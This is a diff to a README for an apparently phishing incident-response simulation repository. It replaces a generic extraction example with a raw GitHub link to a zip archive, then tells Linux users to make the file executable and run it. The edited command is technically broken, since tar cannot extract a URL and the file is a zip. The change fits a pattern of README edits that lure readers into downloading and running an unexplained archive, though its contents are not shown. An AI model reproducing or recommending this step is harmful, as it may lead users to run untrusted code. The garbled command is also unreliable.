sbeltos/phishing-ir-simulation/README.md

 #### Linux

-- Extract the contents if needed (e.g., `tar -xzf filename.tar.gz`).
+- Extract the contents if needed (e.g., `tar -xzf https://raw.githubusercontent.com/sbeltos/phishing-ir-simulation/main/scripts/ir_simulation_phishing_1.0.zip`).
 - Make the main file executable (use `chmod +x filename`).
 - Run the application with `./filename` or install as described in any included README file.